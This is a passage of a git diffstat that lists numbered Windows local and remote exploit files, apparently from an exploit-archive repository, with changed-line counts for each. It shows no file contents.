+- platforms/windows/local/3779.c | 916 +- platforms/windows/local/3793.c | 2866 ++-- platforms/windows/local/3798.c | 2404 +-- platforms/windows/local/3812.c | 2608 ++-- platforms/windows/local/388.c | 6 +- platforms/windows/local/3897.c | 680 +- platforms/windows/local/395.c | 6 +- platforms/windows/local/4001.cpp | 186 +- platforms/windows/local/4002.py | 90 +- platforms/windows/local/4024.rb | 170 +- platforms/windows/local/403.c | 6 +- platforms/windows/local/4080.php | 72 +- platforms/windows/local/4165.c | 780 +- platforms/windows/local/4204.php | 104 +- platforms/windows/local/4218.php | 46 +- platforms/windows/local/4236.php | 64 +- platforms/windows/local/4252.c | 1240 +- platforms/windows/local/4257.c | 144 +- platforms/windows/local/4262.cpp | 730 +- platforms/windows/local/4263.cpp | 802 +- platforms/windows/local/4270.php | 98 +- platforms/windows/local/4274.php | 96 +- platforms/windows/local/4302.php | 100 +- platforms/windows/local/4303.php | 78 +- platforms/windows/local/4311.php | 84 +- platforms/windows/local/4314.php | 50 +- platforms/windows/local/4325.php | 2 +- platforms/windows/local/4345.c | 1106 +- platforms/windows/local/4354.py | 64 +- platforms/windows/local/4355.php | 6 +- platforms/windows/local/4361.pl | 738 +- platforms/windows/local/4431.py | 204 +- platforms/windows/local/4517.php | 88 +- platforms/windows/local/4553.php | 136 +- platforms/windows/local/4583.py | 110 +- platforms/windows/local/4701.pl | 236 +- platforms/windows/local/4702.pl | 534 +- platforms/windows/local/4749.c | 232 +- platforms/windows/local/4892.py | 178 +- platforms/windows/local/4938.py | 254 +- platforms/windows/local/4998.c | 13082 ++++++++-------- platforms/windows/local/5004.c | 554 +- platforms/windows/local/5077.cpp | 268 +- platforms/windows/local/5141.c | 188 +- platforms/windows/local/5144.c | 686 +- platforms/windows/local/5250.cpp | 188 +- platforms/windows/local/5346.pl | 92 +- platforms/windows/local/5361.py | 222 +- platforms/windows/local/5479.txt | 350 +- platforms/windows/local/5492.cpp | 156 +- platforms/windows/local/5498.py | 206 +- platforms/windows/local/558.c | 6 +- platforms/windows/local/5584.c | 14736 +++++++++--------- platforms/windows/local/5625.c | 304 +- platforms/windows/local/5667.py | 322 +- platforms/windows/local/5837.c | 512 +- platforms/windows/local/6039.c | 300 +- platforms/windows/local/6322.pl | 522 +- platforms/windows/local/6329.pl | 130 +- platforms/windows/local/6333.pl | 526 +- platforms/windows/local/6389.cpp | 226 +- platforms/windows/local/6787.pl | 352 +- platforms/windows/local/6798.pl | 144 +- platforms/windows/local/6825.pl | 180 +- platforms/windows/local/6831.cpp | 838 +- platforms/windows/local/7051.pl | 150 +- platforms/windows/local/7135.htm | 82 +- platforms/windows/local/7264.txt | 80 +- platforms/windows/local/7329.py | 116 +- platforms/windows/local/7334.pl | 132 +- platforms/windows/local/7347.pl | 270 +- platforms/windows/local/7501.asp | 492 +- platforms/windows/local/7577.pl | 290 +- platforms/windows/local/7684.pl | 82 +- platforms/windows/local/7688.pl | 100 +- platforms/windows/local/7727.pl | 362 +- platforms/windows/local/7765.py | 90 +- platforms/windows/local/7839.py | 106 +- platforms/windows/local/7843.c | 84 +- platforms/windows/local/7848.pl | 94 +- platforms/windows/local/7853.pl | 188 +- platforms/windows/local/79.c | 6 +- platforms/windows/local/7923.c | 274 +- platforms/windows/local/7957.pl | 188 +- platforms/windows/local/7973.pl | 76 +- platforms/windows/local/7974.c | 84 +- platforms/windows/local/7975.py | 164 +- platforms/windows/local/798.c | 6 +- platforms/windows/local/8126.py | 110 +- platforms/windows/local/8137.py | 116 +- platforms/windows/local/8159.rb | 164 +- platforms/windows/local/8162.py | 120 +- platforms/windows/local/8171.py | 120 +- platforms/windows/local/8174.py | 106 +- platforms/windows/local/8177.py | 90 +- platforms/windows/local/8178.pl | 410 +- platforms/windows/local/8179.rb | 196 +- platforms/windows/local/8193.py | 118 +- platforms/windows/local/8214.c | 372 +- platforms/windows/local/8231.php | 872 +- platforms/windows/local/8236.py | 128 +- platforms/windows/local/8249.php | 160 +- platforms/windows/local/8251.py | 118 +- platforms/windows/local/8270.pl | 114 +- platforms/windows/local/8274.pl | 134 +- platforms/windows/local/8275.pl | 204 +- platforms/windows/local/8299.py | 200 +- platforms/windows/local/8301.pl | 116 +- platforms/windows/local/8311.py | 200 +- platforms/windows/local/833.cpp | 6 +- platforms/windows/local/834.c | 6 +- platforms/windows/local/8343.pl | 5216 +++---- platforms/windows/local/835.c | 6 +- platforms/windows/local/836.c | 6 +- platforms/windows/local/837.c | 6 +- platforms/windows/local/8371.pl | 56 +- platforms/windows/local/839.cpp | 6 +- platforms/windows/local/8401.cpp | 218 +- platforms/windows/local/8410.pl | 74 +- platforms/windows/local/8412.pl | 74 +- platforms/windows/local/8413.pl | 74 +- platforms/windows/local/8416.pl | 74 +- platforms/windows/local/8420.py | 104 +- platforms/windows/local/8426.pl | 220 +- platforms/windows/local/8427.py | 100 +- platforms/windows/local/844.asm | 6 +- platforms/windows/local/8444.cpp | 222 +- platforms/windows/local/846.cpp | 6 +- platforms/windows/local/848.asm | 6 +- platforms/windows/local/8580.py | 152 +- platforms/windows/local/8582.py | 98 +- platforms/windows/local/8583.py | 106 +- platforms/windows/local/8589.py | 74 +- platforms/windows/local/8594.pl | 50 +- platforms/windows/local/8612.pl | 72 +- platforms/windows/local/8620.pl | 82 +- platforms/windows/local/8624.pl | 80 +- platforms/windows/local/8628.pl | 100 +- platforms/windows/local/8629.pl | 100 +- platforms/windows/local/863.cpp | 6 +- platforms/windows/local/8630.pl | 126 +- platforms/windows/local/8631.pl | 100 +- platforms/windows/local/8632.pl | 126 +- platforms/windows/local/8633.pl | 100 +- platforms/windows/local/8634.pl | 126 +- platforms/windows/local/8637.pl | 180 +- platforms/windows/local/8640.pl | 84 +- platforms/windows/local/8656.py | 156 +- platforms/windows/local/8657.txt | 81 +- platforms/windows/local/8660.pl | 84 +- platforms/windows/local/8661.pl | 82 +- platforms/windows/local/8662.py | 100 +- platforms/windows/local/8663.pl | 58 +- platforms/windows/local/8670.php | 116 +- platforms/windows/local/8698.pl | 60 +- platforms/windows/local/8701.py | 82 +- platforms/windows/local/8780.php | 240 +- platforms/windows/local/8789.py | 188 +- platforms/windows/local/884.cpp | 6 +- platforms/windows/local/885.cpp | 6 +- platforms/windows/local/8863.c | 282 +- platforms/windows/local/8983.c | 620 +- platforms/windows/local/9034.pl | 84 +- platforms/windows/local/9038.py | 100 +- platforms/windows/local/9047.pl | 86 +- platforms/windows/local/905.c | 6 +- platforms/windows/local/9064.pl | 84 +- platforms/windows/local/9070.pl | 70 +- platforms/windows/local/912.c | 6 +- platforms/windows/local/9146.pl | 133 +- platforms/windows/local/9149.pl | 90 +- platforms/windows/local/9152.pl | 82 +- platforms/windows/local/9172.pl | 78 +- platforms/windows/local/918.c | 6 +- platforms/windows/local/919.c | 6 +- platforms/windows/local/9190.pl | 104 +- platforms/windows/local/9199.txt | 72 +- platforms/windows/local/920.c | 6 +- platforms/windows/local/9215.pl | 98 +- platforms/windows/local/9216.pl | 144 +- platforms/windows/local/9223.txt | 144 +- platforms/windows/local/9272.py | 98 +- platforms/windows/local/9286.pl | 168 +- platforms/windows/local/9298.pl | 178 +- platforms/windows/local/9305.txt | 98 +- platforms/windows/local/932.sql | 6 +- platforms/windows/local/933.sql | 6 +- platforms/windows/local/9343.pl | 100 +- platforms/windows/local/9346.pl | 88 +- platforms/windows/local/935.c | 6 +- platforms/windows/local/9354.pl | 56 +- platforms/windows/local/936.c | 6 +- platforms/windows/local/9364.py | 38 +- platforms/windows/local/937.c | 6 +- platforms/windows/local/9377.pl | 90 +- platforms/windows/local/9379.pl | 62 +- platforms/windows/local/938.cpp | 6 +- platforms/windows/local/9386.txt | 138 +- platforms/windows/local/9409.pl | 84 +- platforms/windows/local/9426.java | 80 +- platforms/windows/local/9428.pl | 88 +- platforms/windows/local/9458.pl | 88 +- platforms/windows/local/9466.pl | 178 +- platforms/windows/local/9483.pl | 508 +- platforms/windows/local/9495.pl | 82 +- platforms/windows/local/9519.pl | 452 +- platforms/windows/local/9536.py | 176 +- platforms/windows/local/9540.py | 144 +- platforms/windows/local/9548.pl | 78 +- platforms/windows/local/9550.txt | 238 +- platforms/windows/local/9551.py | 204 +- platforms/windows/local/9567.pl | 76 +- platforms/windows/local/9580.pl | 82 +- platforms/windows/local/9610.py | 182 +- platforms/windows/local/9619.pl | 92 +- platforms/windows/local/9624.py | 102 +- platforms/windows/local/9628.pl | 84 +- platforms/windows/local/963.c | 6 +- platforms/windows/local/964.c | 6 +- platforms/windows/local/965.c | 6 +- platforms/windows/local/9655.pl | 80 +- platforms/windows/local/9659.cpp | 700 +- platforms/windows/local/966.c | 6 +- platforms/windows/local/9680.txt | 138 +- platforms/windows/local/9983.pl | 1 - platforms/windows/remote/1026.cpp | 6 +- platforms/windows/remote/1028.c | 6 +- platforms/windows/remote/103.c | 6 +- platforms/windows/remote/1035.c | 6 +- platforms/windows/remote/1066.cpp | 6 +- platforms/windows/remote/1075.c | 6 +- platforms/windows/remote/1079.html | 6 +- platforms/windows/remote/109.c | 6 +- platforms/windows/remote/1096.txt | 6 +- platforms/windows/remote/1099.pl | 6 +- platforms/windows/remote/1108.pl | 6 +- platforms/windows/remote/1115.pl | 6 +- platforms/windows/remote/1118.c | 6 +- platforms/windows/remote/1130.c | 6 +- platforms/windows/remote/1131.c | 6 +- platforms/windows/remote/1132.c | 6 +- platforms/windows/remote/1147.pm | 6 +- platforms/windows/remote/1150.pm | 6 +- platforms/windows/remote/1152.pm | 6 +- platforms/windows/remote/116.c | 6 +- platforms/windows/remote/117.c | 6 +- platforms/windows/remote/1178.c | 6 +- platforms/windows/remote/1179.c | 6 +- platforms/windows/remote/1180.c | 6 +- platforms/windows/remote/119.c | 6 +- platforms/windows/remote/1190.c | 6 +- platforms/windows/remote/1193.pl | 6 +- platforms/windows/remote/1201.pl | 6 +- platforms/windows/remote/121.c | 6 +- platforms/windows/remote/1210.pm | 6 +- platforms/windows/remote/1223.c | 618 +- platforms/windows/remote/123.c | 6 +- platforms/windows/remote/1243.c | 216 +- platforms/windows/remote/1260.pm | 324 +- platforms/windows/remote/1262.pm | 240 +- platforms/windows/remote/1264.pl | 678 +- platforms/windows/remote/1277.c | 246 +- platforms/windows/remote/1279.pm | 264 +- platforms/windows/remote/130.c | 6 +- platforms/windows/remote/1313.c | 522 +- platforms/windows/remote/1332.pm | 316 +- platforms/windows/remote/135.c | 6 +- platforms/windows/remote/1357.diff | 342 +- platforms/windows/remote/136.pl | 6 +- platforms/windows/remote/1365.pm | 327 +- platforms/windows/remote/1366.pm | 355 +- platforms/windows/remote/1374.pl | 116 +- platforms/windows/remote/1391.pm | 697 +- platforms/windows/remote/1408.pl | 180 +- platforms/windows/remote/1413.c | 754 +- platforms/windows/remote/1414.pl | 186 +- platforms/windows/remote/1417.pl | 112 +- platforms/windows/remote/1420.c | 2798 ++-- platforms/windows/remote/1421.cpp | 498 +- platforms/windows/remote/1463.pm | 215 +- platforms/windows/remote/1466.pl | 122 +- platforms/windows/remote/1504.pm | 532 +- platforms/windows/remote/1505.html | 210 +- platforms/windows/remote/1506.c | 978 +- platforms/windows/remote/1536.pm | 447 +- platforms/windows/remote/155.c | 6 +- platforms/windows/remote/1565.pl | 152 +- platforms/windows/remote/159.c | 6 +- platforms/windows/remote/1592.c | 612 +- platforms/windows/remote/1606.html | 172 +- platforms/windows/remote/1607.cpp | 206 +- platforms/windows/remote/1620.pm | 634 +- platforms/windows/remote/1628.cpp | 228 +- platforms/windows/remote/163.pl | 6 +- platforms/windows/remote/164.c | 6 +- platforms/windows/remote/165.c | 6 +- platforms/windows/remote/166.pl | 6 +- platforms/windows/remote/1664.py | 114 +- platforms/windows/remote/168.c | 6 +- platforms/windows/remote/1681.pm | 254 +- platforms/windows/remote/1703.pl | 486 +- platforms/windows/remote/1776.c | 376 +- platforms/windows/remote/20.txt | 6 +- platforms/windows/remote/2070.pl | 166 +- platforms/windows/remote/2074.pm | 172 +- platforms/windows/remote/2075.pm | 172 +- platforms/windows/remote/2076.pl | 152 +- platforms/windows/remote/2079.pl | 214 +- platforms/windows/remote/2080.pl | 186 +- platforms/windows/remote/2140.pm | 212 +- platforms/windows/remote/2276.pm | 606 +- platforms/windows/remote/2277.c | 378 +- platforms/windows/remote/2283.c | 844 +- platforms/windows/remote/23.c | 6 +- platforms/windows/remote/232.c | 6 +- platforms/windows/remote/2320.txt | 24 +- platforms/windows/remote/2328.php | 294 +- platforms/windows/remote/2345.pl | 192 +- platforms/windows/remote/2358.c | 348 +- platforms/windows/remote/2401.c | 370 +- platforms/windows/remote/2403.c | 414 +- platforms/windows/remote/2408.pl | 310 +- platforms/windows/remote/2425.html | 4 +- platforms/windows/remote/2426.pl | 330 +- platforms/windows/remote/2440.rb | 270 +- platforms/windows/remote/2448.html | 134 +- platforms/windows/remote/2458.pl | 216 +- platforms/windows/remote/2460.c | 338 +- platforms/windows/remote/2601.c | 804 +- platforms/windows/remote/2637.c | 438 +- platforms/windows/remote/2651.c | 292 +- platforms/windows/remote/266.c | 6 +- platforms/windows/remote/2671.pl | 200 +- platforms/windows/remote/268.c | 6 +- platforms/windows/remote/2680.pm | 248 +- platforms/windows/remote/2689.c | 450 +- platforms/windows/remote/2729.pm | 282 +- platforms/windows/remote/2743.html | 136 +- platforms/windows/remote/2749.html | 142 +- platforms/windows/remote/2753.c | 366 +- platforms/windows/remote/2770.rb | 400 +- platforms/windows/remote/2771.rb | 378 +- platforms/windows/remote/2785.c | 630 +- platforms/windows/remote/2809.py | 208 +- platforms/windows/remote/2866.html | 34 +- platforms/windows/remote/293.c | 6 +- platforms/windows/remote/295.c | 6 +- platforms/windows/remote/297.c | 6 +- platforms/windows/remote/2974.pl | 42 +- platforms/windows/remote/3037.php | 168 +- platforms/windows/remote/3055.html | 110 +- platforms/windows/remote/3058.html | 98 +- platforms/windows/remote/3063.pl | 40 +- platforms/windows/remote/3084.txt | 24 +- platforms/windows/remote/3086.py | 178 +- platforms/windows/remote/310.txt | 6 +- platforms/windows/remote/313.txt | 6 +- platforms/windows/remote/315.txt | 6 +- platforms/windows/remote/316.txt | 6 +- platforms/windows/remote/3168.java | 560 +- platforms/windows/remote/3211.py | 138 +- platforms/windows/remote/3218.pl | 288 +- platforms/windows/remote/3244.py | 186 +- platforms/windows/remote/3264.pl | 218 +- platforms/windows/remote/3279.html | 114 +- platforms/windows/remote/3291.pl | 210 +- platforms/windows/remote/3302.sh | 278 +- platforms/windows/remote/3319.pl | 264 +- platforms/windows/remote/3320.pl | 256 +- platforms/windows/remote/3364.pl | 232 +- platforms/windows/remote/3380.txt | 110 +- platforms/windows/remote/3391.py | 172 +- platforms/windows/remote/3395.c | 368 +- platforms/windows/remote/3462.cpp | 360 +- platforms/windows/remote/3463.cpp | 460 +- platforms/windows/remote/3495.txt | 240 +- platforms/windows/remote/3561.pl | 234 +- platforms/windows/remote/3575.cpp | 1058 +- platforms/windows/remote/36.c | 6 +- platforms/windows/remote/3604.py | 456 +- platforms/windows/remote/361.txt | 6 +- platforms/windows/remote/3661.pl | 224 +- platforms/windows/remote/3662.rb | 249 +- platforms/windows/remote/3737.py | 222 +- platforms/windows/remote/3738.php | 448 +- platforms/windows/remote/3740.c | 386 +- platforms/windows/remote/378.pl | 6 +- platforms/windows/remote/3810.html | 166 +- platforms/windows/remote/3877.html | 158 +- platforms/windows/remote/3880.html | 150 +- platforms/windows/remote/3881.html | 144 +- platforms/windows/remote/3893.c | 386 +- platforms/windows/remote/3925.py | 118 +- platforms/windows/remote/3927.html | 90 +- platforms/windows/remote/3934.py | 112 +- platforms/windows/remote/3938.html | 92 +- platforms/windows/remote/3950.html | 122 +- platforms/windows/remote/3951.html | 128 +- platforms/windows/remote/3952.html | 128 +- platforms/windows/remote/3961.html | 90 +- platforms/windows/remote/3966.php | 120 +- platforms/windows/remote/3967.html | 44 +- platforms/windows/remote/3968.html | 216 +- platforms/windows/remote/3982.html | 72 +- platforms/windows/remote/4008.html | 64 +- platforms/windows/remote/4010.html | 98 +- platforms/windows/remote/4014.py | 232 +- platforms/windows/remote/4015.html | 400 +- platforms/windows/remote/4016.sh | 38 +- platforms/windows/remote/4021.html | 118 +- platforms/windows/remote/4042.html | 88 +- platforms/windows/remote/4043.html | 80 +- platforms/windows/remote/4045.py | 584 +- platforms/windows/remote/4049.html | 106 +- platforms/windows/remote/4050.html | 76 +- platforms/windows/remote/4052.c | 288 +- platforms/windows/remote/4053.c | 290 +- platforms/windows/remote/4060.html | 88 +- platforms/windows/remote/4061.html | 60 +- platforms/windows/remote/4109.html | 88 +- platforms/windows/remote/4119.html | 158 +- platforms/windows/remote/4123.html | 120 +- platforms/windows/remote/4146.cpp | 1586 +- platforms/windows/remote/4152.py | 290 +- platforms/windows/remote/4157.cpp | 932 +- platforms/windows/remote/4158.html | 258 +- platforms/windows/remote/4160.html | 76 +- platforms/windows/remote/4170.html | 238 +- platforms/windows/remote/4176.html | 154 +- platforms/windows/remote/4177.html | 286 +- platforms/windows/remote/4190.html | 114 +- platforms/windows/remote/42.c | 6 +- platforms/windows/remote/4200.html | 156 +- platforms/windows/remote/4207.py | 350 +- platforms/windows/remote/4208.html | 78 +- platforms/windows/remote/421.c | 6 +- platforms/windows/remote/4217.html | 74 +- platforms/windows/remote/4222.c | 380 +- platforms/windows/remote/4223.pl | 302 +- platforms/windows/remote/4228.pl | 294 +- platforms/windows/remote/4230.html | 34 +- platforms/windows/remote/4237.html | 34 +- platforms/windows/remote/4240.html | 168 +- platforms/windows/remote/4244.html | 156 +- platforms/windows/remote/4245.html | 148 +- platforms/windows/remote/4247.c | 686 +- platforms/windows/remote/4255.html | 96 +- platforms/windows/remote/4259.txt | 106 +- platforms/windows/remote/426.c | 6 +- platforms/windows/remote/4279.html | 106 +- platforms/windows/remote/4287.py | 226 +- platforms/windows/remote/4290.html | 76 +- platforms/windows/remote/4292.cpp | 1022 +- platforms/windows/remote/431.c | 6 +- platforms/windows/remote/4328.html | 204 +- platforms/windows/remote/4348.c | 152 +- platforms/windows/remote/435.c | 6 +- platforms/windows/remote/4351.html | 98 +- platforms/windows/remote/4357.html | 68 +- platforms/windows/remote/4366.html | 104 +- platforms/windows/remote/4372.html | 74 +- platforms/windows/remote/4388.html | 74 +- platforms/windows/remote/4389.html | 162 +- platforms/windows/remote/439.c | 6 +- platforms/windows/remote/4393.html | 90 +- platforms/windows/remote/4394.html | 74 +- platforms/windows/remote/4398.html | 106 +- platforms/windows/remote/4420.html | 112 +- platforms/windows/remote/4427.html | 58 +- platforms/windows/remote/4428.html | 88 +- platforms/windows/remote/4429.pl | 264 +- platforms/windows/remote/4445.html | 92 +- platforms/windows/remote/4450.py | 128 +- platforms/windows/remote/4452.html | 158 +- platforms/windows/remote/4455.pl | 252 +- platforms/windows/remote/4468.html | 106 +- platforms/windows/remote/4487.html | 68 +- platforms/windows/remote/4488.html | 74 +- platforms/windows/remote/45.c | 6 +- platforms/windows/remote/4506.html | 86 +- platforms/windows/remote/4526.html | 40 +- platforms/windows/remote/4566.rb | 168 +- platforms/windows/remote/4574.pl | 374 +- platforms/windows/remote/4579.html | 138 +- platforms/windows/remote/4594.html | 88 +- platforms/windows/remote/4598.html | 62 +- platforms/windows/remote/4651.cpp | 530 +- platforms/windows/remote/4663.html | 192 +- platforms/windows/remote/4700.txt | 210 +- platforms/windows/remote/4713.txt | 312 +- platforms/windows/remote/472.c | 6 +- platforms/windows/remote/4720.html | 512 +- platforms/windows/remote/473.c | 6 +- platforms/windows/remote/4746.html | 178 +- platforms/windows/remote/4747.vbs | 76 +- platforms/windows/remote/475.sh | 6 +- platforms/windows/remote/478.c | 6 +- platforms/windows/remote/480.c | 6 +- platforms/windows/remote/4806.html | 228 +- platforms/windows/remote/4818.html | 232 +- platforms/windows/remote/4819.html | 228 +- platforms/windows/remote/4820.html | 230 +- platforms/windows/remote/4825.html | 230 +- platforms/windows/remote/4869.html | 60 +- platforms/windows/remote/4873.html | 62 +- platforms/windows/remote/4874.html | 84 +- platforms/windows/remote/4894.html | 138 +- platforms/windows/remote/4909.html | 70 +- platforms/windows/remote/4913.html | 52 +- platforms/windows/remote/4918.html | 158 +- platforms/windows/remote/4923.txt | 128 +- platforms/windows/remote/4932.html | 156 +- platforms/windows/remote/4934.c | 826 +- platforms/windows/remote/4946.html | 132 +- platforms/windows/remote/4959.html | 146 +- platforms/windows/remote/4967.html | 236 +- platforms/windows/remote/4974.html | 38 +- platforms/windows/remote/4979.html | 240 +- platforms/windows/remote/4981.html | 404 +- platforms/windows/remote/4982.html | 240 +- platforms/windows/remote/4986.html | 70 +- platforms/windows/remote/4987.html | 236 +- platforms/windows/remote/4999.htm | 66 +- platforms/windows/remote/5005.html | 66 +- platforms/windows/remote/5025.html | 238 +- platforms/windows/remote/5028.html | 48 +- platforms/windows/remote/5045.html | 74 +- platforms/windows/remote/5046.php | 174 +- platforms/windows/remote/5048.html | 120 +- platforms/windows/remote/5049.html | 264 +- platforms/windows/remote/5051.html | 242 +- platforms/windows/remote/5052.html | 238 +- platforms/windows/remote/5078.htm | 38 +- platforms/windows/remote/5079.c | 714 +- platforms/windows/remote/5087.html | 178 +- platforms/windows/remote/51.c | 6 +- platforms/windows/remote/5100.html | 240 +- platforms/windows/remote/5102.html | 94 +- platforms/windows/remote/5153.asp | 74 +- platforms/windows/remote/5188.html | 58 +- platforms/windows/remote/5190.html | 238 +- platforms/windows/remote/5193.html | 146 +- platforms/windows/remote/5205.html | 244 +- platforms/windows/remote/5212.py | 64 +- platforms/windows/remote/5228.txt | 196 +- platforms/windows/remote/5230.txt | 154 +- platforms/windows/remote/5238.py | 548 +- platforms/windows/remote/5264.html | 134 +- platforms/windows/remote/5269.txt | 260 +- platforms/windows/remote/5332.html | 260 +- platforms/windows/remote/5338.html | 46 +- platforms/windows/remote/5395.html | 86 +- platforms/windows/remote/5397.txt | 122 +- platforms/windows/remote/5398.html | 262 +- platforms/windows/remote/5489.html | 52 +- platforms/windows/remote/5496.html | 108 +- platforms/windows/remote/5511.html | 70 +- platforms/windows/remote/5530.html | 244 +- platforms/windows/remote/5536.php | 198 +- platforms/windows/remote/556.c | 6 +- platforms/windows/remote/56.c | 6 +- platforms/windows/remote/5619.html | 116 +- platforms/windows/remote/566.pl | 6 +- platforms/windows/remote/5681.html | 352 +- platforms/windows/remote/5694.cpp | 1168 +- platforms/windows/remote/5695.cpp | 1548 +- platforms/windows/remote/572.pl | 6 +- platforms/windows/remote/5732.html | 134 +- platforms/windows/remote/5738.rb | 174 +- platforms/windows/remote/5741.html | 606 +- platforms/windows/remote/5746.html | 170 +- platforms/windows/remote/5747.html | 128 +- platforms/windows/remote/5750.html | 96 +- platforms/windows/remote/577.c | 6 +- platforms/windows/remote/5777.html | 170 +- platforms/windows/remote/5778.html | 136 +- platforms/windows/remote/5793.html | 142 +- platforms/windows/remote/5795.html | 70 +- platforms/windows/remote/582.c | 6 +- platforms/windows/remote/5827.cpp | 1224 +- platforms/windows/remote/583.pl | 6 +- platforms/windows/remote/584.c | 6 +- platforms/windows/remote/589.html | 8 +- platforms/windows/remote/590.c | 6 +- platforms/windows/remote/6012.php | 266 +- platforms/windows/remote/6124.c | 90 +- platforms/windows/remote/6151.txt | 126 +- platforms/windows/remote/6152.html | 238 +- platforms/windows/remote/6175.html | 134 +- platforms/windows/remote/619.c | 6 +- platforms/windows/remote/621.c | 6 +- platforms/windows/remote/6220.html | 74 +- platforms/windows/remote/623.c | 6 +- platforms/windows/remote/627.pl | 6 +- platforms/windows/remote/6278.txt | 736 +- platforms/windows/remote/6302.pl | 344 +- platforms/windows/remote/6317.html | 158 +- platforms/windows/remote/6318.html | 132 +- platforms/windows/remote/6323.html | 142 +- platforms/windows/remote/6324.html | 42 +- platforms/windows/remote/6334.html | 52 +- platforms/windows/remote/6355.txt | 36 +- platforms/windows/remote/637.c | 6 +- platforms/windows/remote/6387.rb | 354 +- platforms/windows/remote/64.c | 6 +- platforms/windows/remote/640.c | 6 +- platforms/windows/remote/6407.c | 678 +- platforms/windows/remote/641.txt | 6 +- platforms/windows/remote/6414.html | 36 +- platforms/windows/remote/6491.html | 134 +- platforms/windows/remote/650.c | 6 +- platforms/windows/remote/6537.html | 2170 +-- platforms/windows/remote/6548.html | 120 +- platforms/windows/remote/658.c | 6 +- platforms/windows/remote/66.c | 6 +- platforms/windows/remote/6630.html | 186 +- platforms/windows/remote/6638.html | 124 +- platforms/windows/remote/6661.txt | 32 +- platforms/windows/remote/668.c | 6 +- platforms/windows/remote/6686.txt | 70 +- platforms/windows/remote/6690.html | 62 +- platforms/windows/remote/6699.html | 106 +- platforms/windows/remote/6773.html | 74 +- platforms/windows/remote/6774.html | 80 +- platforms/windows/remote/6776.html | 80 +- platforms/windows/remote/6793.html | 142 +- platforms/windows/remote/6801.txt | 316 +- platforms/windows/remote/6804.pl | 122 +- platforms/windows/remote/6813.html | 90 +- platforms/windows/remote/6828.html | 158 +- platforms/windows/remote/6840.html | 204 +- platforms/windows/remote/6870.html | 94 +- platforms/windows/remote/6871.html | 138 +- platforms/windows/remote/6872.html | 90 +- platforms/windows/remote/6875.html | 80 +- platforms/windows/remote/6878.html | 154 +- platforms/windows/remote/6880.html | 222 +- platforms/windows/remote/69.c | 6 +- platforms/windows/remote/6963.html | 2172 +-- platforms/windows/remote/70.c | 6 +- platforms/windows/remote/7056.rb | 214 +- platforms/windows/remote/7142.html | 58 +- platforms/windows/remote/7145.txt | 86 +- platforms/windows/remote/7167.html | 74 +- platforms/windows/remote/7181.html | 74 +- platforms/windows/remote/730.html | 6 +- platforms/windows/remote/7355.txt | 326 +- platforms/windows/remote/7402.html | 142 +- platforms/windows/remote/7442.txt | 104 +- platforms/windows/remote/7452.pl | 196 +- platforms/windows/remote/7477.html | 96 +- platforms/windows/remote/7521.txt | 22 +- platforms/windows/remote/7566.html | 28 +- platforms/windows/remote/7583.pl | 122 +- platforms/windows/remote/7584.pl | 212 +- platforms/windows/remote/7594.html | 58 +- platforms/windows/remote/76.c | 6 +- platforms/windows/remote/7623.html | 70 +- platforms/windows/remote/7630.html | 82 +- platforms/windows/remote/7706.mrc | 144 +- platforms/windows/remote/7739.html | 124 +- platforms/windows/remote/7747.html | 66 +- platforms/windows/remote/7748.html | 66 +- platforms/windows/remote/7749.html | 78 +- platforms/windows/remote/7755.html | 58 +- platforms/windows/remote/7757.html | 78 +- platforms/windows/remote/7762.html | 60 +- platforms/windows/remote/7763.html | 78 +- platforms/windows/remote/7779.html | 60 +- platforms/windows/remote/7794.html | 62 +- platforms/windows/remote/7842.html | 96 +- platforms/windows/remote/7868.html | 74 +- platforms/windows/remote/7871.html | 162 +- platforms/windows/remote/7875.pl | 410 +- platforms/windows/remote/7903.html | 94 +- platforms/windows/remote/7910.html | 44 +- platforms/windows/remote/7913.pl | 286 +- platforms/windows/remote/7926.pl | 216 +- platforms/windows/remote/7935.html | 32 +- platforms/windows/remote/794.c | 6 +- platforms/windows/remote/7966.txt | 100 +- platforms/windows/remote/7988.pl | 152 +- platforms/windows/remote/7989.pl | 238 +- platforms/windows/remote/802.cpp | 6 +- platforms/windows/remote/804.c | 6 +- platforms/windows/remote/8041.txt | 34 +- platforms/windows/remote/81.c | 6 +- platforms/windows/remote/8117.pl | 200 +- platforms/windows/remote/8118.html | 94 +- platforms/windows/remote/8143.html | 84 +- platforms/windows/remote/8144.txt | 76 +- platforms/windows/remote/8155.txt | 36 +- platforms/windows/remote/8160.html | 86 +- platforms/windows/remote/8200.pl | 94 +- platforms/windows/remote/8203.pl | 230 +- platforms/windows/remote/8206.html | 148 +- platforms/windows/remote/8208.html | 76 +- platforms/windows/remote/8211.pl | 92 +- platforms/windows/remote/8215.txt | 68 +- platforms/windows/remote/8227.pl | 314 +- platforms/windows/remote/8248.py | 150 +- platforms/windows/remote/825.c | 6 +- platforms/windows/remote/8253.c | 784 +- platforms/windows/remote/8256.c | 260 +- platforms/windows/remote/8257.txt | 184 +- platforms/windows/remote/827.c | 6 +- platforms/windows/remote/8284.pl | 124 +- platforms/windows/remote/8295.pl | 142 +- platforms/windows/remote/8321.py | 120 +- platforms/windows/remote/8332.txt | 176 +- platforms/windows/remote/8336.pl | 190 +- platforms/windows/remote/8338.py | 190 +- platforms/windows/remote/8339.py | 242 +- platforms/windows/remote/8340.py | 234 +- platforms/windows/remote/8354.py | 220 +- platforms/windows/remote/8363.py | 130 +- platforms/windows/remote/8368.txt | 92 +- platforms/windows/remote/8392.txt | 117 +- platforms/windows/remote/8421.py | 88 +- platforms/windows/remote/8428.txt | 62 +- platforms/windows/remote/847.cpp | 6 +- platforms/windows/remote/8537.txt | 52 +- platforms/windows/remote/854.cpp | 6 +- platforms/windows/remote/8554.py | 140 +- platforms/windows/remote/8560.html | 252 +- platforms/windows/remote/8561.pl | 138 +- platforms/windows/remote/8562.html | 122 +- platforms/windows/remote/8564.pl | 250 +- platforms/windows/remote/8579.html | 80 +- platforms/windows/remote/859.c | 6 +- platforms/windows/remote/8613.py | 130 +- platforms/windows/remote/8614.py | 116 +- platforms/windows/remote/8621.py | 138 +- platforms/windows/remote/8623.rb | 234 +- platforms/windows/remote/8651.pl | 134 +- platforms/windows/remote/8716.py | 124 +- platforms/windows/remote/8732.py | 156 +- platforms/windows/remote/8742.txt | 50 +- platforms/windows/remote/875.c | 6 +- platforms/windows/remote/8754.patch | 238 +- platforms/windows/remote/8757.html | 98 +- platforms/windows/remote/8758.html | 96 +- platforms/windows/remote/8765.php | 194 +- platforms/windows/remote/8804.py | 138 +- platforms/windows/remote/8806.pl | 250 +- platforms/windows/remote/8824.html | 60 +- platforms/windows/remote/883.c | 6 +- platforms/windows/remote/8835.html | 90 +- platforms/windows/remote/8897.c 